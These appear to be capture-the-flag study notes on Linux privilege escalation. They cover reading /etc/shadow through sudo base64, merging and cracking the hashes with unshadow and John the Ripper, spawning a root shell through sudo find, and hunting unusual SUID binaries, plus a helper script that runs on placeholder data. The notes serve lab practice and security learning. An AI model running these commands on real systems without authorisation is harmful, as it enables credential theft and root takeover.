Important Commands

Enumeration & Password Cracking

sudo -l

sudo base64 /etc/shadow | base64 --decode

(First check with sudo -l which binaries you are allowed to run as root. If base64 is one of them, the command above reads a file your own account has no permission for: sudo runs the base64 encoding as root and the decode step runs as you. /etc/passwd is world-readable anyway, so the file worth reading this way is /etc/shadow, which holds the password hashes. The same works when base64 carries the SUID bit instead of a sudo rule.)

Then,

  1. Copy all content of /etc/shadow (as read with the command above) into the shadow.txt file

  2. Copy all content of /etc/passwd into the passwd.txt file

Then, unshadow it (this only merges the two files into the format John expects; it needs no root and cracks nothing yet) -

unshadow passwd.txt shadow.txt > unshadowed.txt

Then, use John the Ripper to crack the hashes, and john --show to print the passwords it recovered

john --wordlist=/usr/share/wordlists/rockyou.txt unshadowed.txt

john --show unshadowed.txt
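The merge step above, as an added example that is not part of the original notes: a small POSIX shell/awk script that does what unshadow does (replace the x password field of each passwd line with the hash from the matching shadow line) and then lists which accounts actually carry a crackable hash. The passwd/shadow records and the $6$ hashes are constructed placeholders, not taken from any real system, and john itself is not run here.

```sh
#!/bin/sh
# Added example, not part of the original notes: reproduce the unshadow merge
# step in plain awk, so the combined file can be built and sanity-checked on a
# box where John is not installed. The sample accounts and hashes below are
# constructed placeholders, not copied from any real system.
set -u

# sample_files DIR: write a constructed passwd/shadow pair into DIR.
# The $6$ values are format-shaped placeholders, not real password hashes.
sample_files() {
  printf '%s\n' \
    'root:x:0:0:root:/root:/bin/bash' \
    'daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin' \
    'alice:x:1000:1000:Alice:/home/alice:/bin/bash' \
    'svc:x:1001:1001::/home/svc:/bin/bash' > "$1/passwd.txt"
  printf '%s\n' \
    'root:$6$rootsalt$PLACEHOLDER.not.a.real.hash.ROOT0000000000000000000000000000000000000000000:19000:0:99999:7:::' \
    'daemon:*:19000:0:99999:7:::' \
    'alice:$6$alicesalt$PLACEHOLDER.not.a.real.hash.ALICE000000000000000000000000000000000000000000:19000:0:99999:7:::' \
    'svc:!:19000:0:99999:7:::' > "$1/shadow.txt"
}

# unshadow_merge PASSWD SHADOW: like unshadow(8), print each passwd line with
# its 'x' password field replaced by the hash field of the matching shadow
# entry. Users without a shadow entry are passed through unchanged.
unshadow_merge() {
  awk -F: -v OFS=: '
    FILENAME == ARGV[1] { hash[$1] = $2; next }   # shadow file: user -> hash
    ($1 in hash)        { $2 = hash[$1] }          # passwd file: swap in hash
                        { print }
  ' "$2" "$1"
}

# crackable_users: read an unshadowed file on stdin and print the users whose
# hash field is a real crypt(3) hash ($id$...). Locked (!) and disabled (*)
# accounts have nothing for John to crack.
crackable_users() {
  awk -F: '$2 ~ /^\$[^$]+\$/ { print $1 }'
}

# Demo run on the constructed data.
dir=$(mktemp -d)
sample_files "$dir"
unshadow_merge "$dir/passwd.txt" "$dir/shadow.txt" > "$dir/unshadowed.txt"
cat "$dir/unshadowed.txt"
echo "accounts worth feeding to john:"
crackable_users < "$dir/unshadowed.txt"
rm -rf "$dir"
```

Feed the merged file to john exactly as in the step above. Locked (!) and disabled (*) accounts stay in the merged file, as unshadow keeps them, but crackable_users shows that only root and alice carry hashes worth the wordlist time.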

sudo find / -name "flag1.txt" --> use to find files (sudo only helps when the file sits in a directory your account cannot read)

sudo find . -exec /bin/sh \; -quit --> spawn a root shell when sudo -l shows that find may be run as root (the ; must be escaped as \; so the shell passes it on to find)

user.txt — how to find it? Use the find command: find / -type f -name user.txt 2> /dev/null

  • -type f — you are telling find to look exclusively for files

  • -name user.txt — instructing the find command to search for a file with the name “user.txt”

  • 2> /dev/null — so error messages do not show up as part of the search result

Search for files with the SUID permission. Which file is weird? Run the command find / -type f -user root -perm /4000 2> /dev/null. What it means: it looks for regular files owned by root that have the SUID bit set, so they run with root's privileges no matter who executes them (-perm /4000 matches files with that bit; 2> /dev/null hides the permission errors). Look carefully at the output: binaries such as passwd, su, sudo and mount are SUID on every system, so the ones that stand out are the unusual ones (custom scripts, copied interpreters, editors, backup tools). Check each of those against GTFOBins to see whether it can be exploited to gain root access.
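An added example, not from the original notes, that turns the SUID search into a repeatable check: it lists SUID files under a given directory (pass / and root to match the find command above) and filters out the binaries that are SUID on a stock Debian/Ubuntu-style install, so the unusual ones are what remain. The baseline list is an assumption of this example and should be adjusted to the target's distribution.

```sh
#!/bin/sh
# Added example, not part of the original notes: list SUID files under a given
# root and separate the ones every stock system has from the ones worth a
# closer look. The baseline list is an assumption for a Debian/Ubuntu-style
# box; trim or extend it for the target's distribution.
set -u

# Binaries expected to be SUID root on a stock install (illustrative baseline).
SUID_BASELINE="passwd su sudo mount umount chsh chfn gpasswd newgrp pkexec fusermount fusermount3 ping ssh-keysign"

# suid_list ROOT [OWNER]: every regular file under ROOT with the SUID bit set,
# optionally limited to files owned by OWNER (use root to mirror the note).
# -perm -4000 requires the SUID bit; for a single bit it equals -perm /4000.
suid_list() {
  if [ -n "${2:-}" ]; then
    find "$1" -type f -user "$2" -perm -4000 2>/dev/null
  else
    find "$1" -type f -perm -4000 2>/dev/null
  fi
}

# suid_unusual ROOT [OWNER]: the same list minus the baseline binaries.
# Whatever is left is the "weird" set to look up (e.g. on GTFOBins) first.
suid_unusual() {
  suid_list "$@" | while IFS= read -r path; do
    name=${path##*/}
    case " $SUID_BASELINE " in
      *" $name "*) ;;                   # standard SUID binary, skip it
      *) printf '%s\n' "$path" ;;       # not expected on a stock box
    esac
  done
}

# Usage on a real target (scans the whole filesystem, so not run here):
#   suid_unusual / root
```

On a real box the unusual list is what you inspect: an unfamiliar SUID binary is only a finding once you confirm it can actually be abused, so look up each remaining entry before running anything.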
